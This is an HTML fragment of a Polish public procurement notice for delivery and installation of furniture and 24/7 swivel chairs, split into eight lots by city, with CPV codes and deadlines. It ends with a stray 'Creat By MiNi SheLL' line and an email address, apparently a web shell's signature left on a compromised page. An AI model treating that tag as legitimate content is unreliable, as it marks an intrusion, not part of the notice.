<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Termin realizacji przedmiotu zamówienia wynosi:
dla zadania nr 3 i 4 - do 50 dni od daty podpisania umowy,
dla zadania nr 1, 2, 5, 6, 7 - do 40 dni od daty podpisania umowy,
dla zadania nr 8 - do dnia 31.07.2014r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa mebli dla lokalizacji Warszawa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem Umowy jest dostawa i montaż mebli wraz z wyposażeniem przez Wykonawcę, zgodnie ze Szczegółowym Opisem Przedmiotu Zamówienia stanowiącym Załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa foteli obrotowych do pracy 24/7  dla lokalizacji Warszawa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Fotele obrotowe przeznaczone są dla pracowników służb operacyjnych pracujących w systemie 24 godzinnym /dobę przez 7 dni w tygodniu. Użytkowane będą w salach operacyjnych działu ARP i zespołu ARFP. Wykorzystywane w sposób ciągły..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.11.11.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa mebli dla lokalizacji Wrocław.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem Umowy jest dostawa i montaż mebli wraz z wyposażeniem przez Wykonawcę, zgodnie ze Szczegółowym Opisem Przedmiotu Zamówienia stanowiącym Załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 50.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa mebli dla lokalizacji Gdańsk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem Umowy jest dostawa i montaż mebli wraz z wyposażeniem przez Wykonawcę, zgodnie ze Szczegółowym Opisem Przedmiotu Zamówienia stanowiącym Załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 50.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa mebli dla lokalizacji Katowice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem Umowy jest dostawa i montaż mebli wraz z wyposażeniem przez Wykonawcę, zgodnie ze Szczegółowym Opisem Przedmiotu Zamówienia stanowiącym Załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.11.11.00-4, 39.13.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa mebli dla lokalizacji Kraków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem Umowy jest dostawa i montaż mebli wraz z wyposażeniem przez Wykonawcę, zgodnie ze Szczegółowym Opisem Przedmiotu Zamówienia stanowiącym Załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa mebli dla lokalizacji Łódź.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem Umowy jest dostawa i montaż mebli wraz z wyposażeniem przez Wykonawcę, zgodnie ze Szczegółowym Opisem Przedmiotu Zamówienia stanowiącym Załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa foteli na potrzeby rozbudowy platformy testowej P_21.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem Umowy jest dostawa i montaż foteli obrotowych przez Wykonawcę, zgodnie ze Szczegółowym Opisem Przedmiotu Zamówienia stanowiącym Załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.11.11.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com